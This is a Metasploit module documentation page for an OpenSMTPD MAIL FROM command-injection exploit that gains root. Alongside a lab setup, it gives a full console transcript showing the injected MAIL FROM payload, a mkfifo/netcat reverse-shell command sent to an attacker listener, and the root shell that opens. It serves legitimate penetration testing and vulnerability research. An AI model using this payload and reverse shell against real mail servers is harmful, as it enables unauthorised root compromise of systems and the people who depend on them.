adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
94de45d856b7d4ea32456bbdc7531af67bfbcaa1
metasploit-gs/documentation/modules/exploit/unix/smtp/opensmtpd_mail_from_rce.md
T
William Vu 8c07e17912 Update module docs
2020-02-06 15:57:54 -06:00

3.5 KiB
Raw Blame History

Vulnerable Application

Description

This module exploits a command injection in the MAIL FROM field during SMTP interaction with OpenSMTPD to execute code as the root user.

Setup

  1. Download OpenBSD 6.6
  2. Install the system, noting the domain name (defaults to foo.my.domain)
  3. Configure the following settings in /etc/mail/smtpd.conf:
  • listen on all
  • match from any for domain "foo.my.domain" action "local_mail"
  1. Execute /etc/rc.d/smtpd restart to restart OpenSMTPD
  2. Execute ifconfig and look for an appropriate target IP

Targets

Id  Name
--  ----
0   OpenSMTPD >= commit a8e222352f

Verification Steps

Follow Setup and Scenarios.

Options

RCPT_TO

Set this to a valid mail recipient. The default is root.

Scenarios

OpenSMTPD 6.6.0 on OpenBSD 6.6

msf5 > use exploit/unix/smtp/opensmtpd_mail_from_rce
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > show missing

Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):

   Name    Current Setting  Required  Description
   ----    ---------------  --------  -----------
   RHOSTS                   yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'


Payload options (cmd/unix/reverse_netcat):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)

msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set rhosts 192.168.56.133
rhosts => 192.168.56.133
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > set lhost 192.168.56.1
lhost => 192.168.56.1
msf5 exploit(unix/smtp/opensmtpd_mail_from_rce) > run

[*] Started reverse TCP handler on 192.168.56.1:4444
[*] 192.168.56.133:25 - Connecting to OpenSMTPD
[*] 192.168.56.133:25 - Saying hello and sending exploit
[*] 192.168.56.133:25 - Expecting: /220.*OpenSMTPD/
[+] 192.168.56.133:25 - Received: 220 foo.my.domain ESMTP OpenSMTPD
[*] 192.168.56.133:25 - Sending: HELO oKFMWnrTJZjTbzkGfVMsyDy7pO35ze
[*] 192.168.56.133:25 - Expecting: /250.*pleased to meet you/
[+] 192.168.56.133:25 - Received:
250 foo.my.domain Hello oKFMWnrTJZjTbzkGfVMsyDy7pO35ze [192.168.56.1], pleased to meet you
[*] 192.168.56.133:25 - Sending: MAIL FROM:<;for J in V e E n U T w v A K M a 0 s x;do read;done;sh;exit 0;>
[*] 192.168.56.133:25 - Expecting: /250.*Ok/
[+] 192.168.56.133:25 - Received:
250 2.0.0 Ok
[*] 192.168.56.133:25 - Sending: RCPT TO:<root>
[*] 192.168.56.133:25 - Expecting: /250.*Recipient ok/
[+] 192.168.56.133:25 - Received:
250 2.1.5 Destination address valid: Recipient ok
[*] 192.168.56.133:25 - Sending: DATA
[*] 192.168.56.133:25 - Expecting: /354 Enter mail.*itself/
[+] 192.168.56.133:25 - Received:
354 Enter mail, end with "." on a line by itself
[*] 192.168.56.133:25 - Sending:
#
#
#
#
#
#
#
#
#
#
#
#
#
#
#
mkfifo /tmp/eizzy; nc 192.168.56.1 4444 0</tmp/eizzy | /bin/sh >/tmp/eizzy 2>&1; rm /tmp/eizzy
[*] 192.168.56.133:25 - Sending: .
[*] 192.168.56.133:25 - Expecting: /250.*Message accepted for delivery/
[+] 192.168.56.133:25 - Received:
250 2.0.0 ccd8e419 Message accepted for delivery
[*] 192.168.56.133:25 - Sending: QUIT
[*] 192.168.56.133:25 - Expecting: /221.*Bye/
[+] 192.168.56.133:25 - Received:
221 2.0.0 Bye
[*] Command shell session 1 opened (192.168.56.1:4444 -> 192.168.56.133:16126) at 2020-02-05 16:16:59 -0600

id
uid=0(root) gid=0(wheel) groups=0(wheel)
uname -a
OpenBSD foo.my.domain 6.6 GENERIC#353 amd64
Reference in New Issue View Git Blame Copy Permalink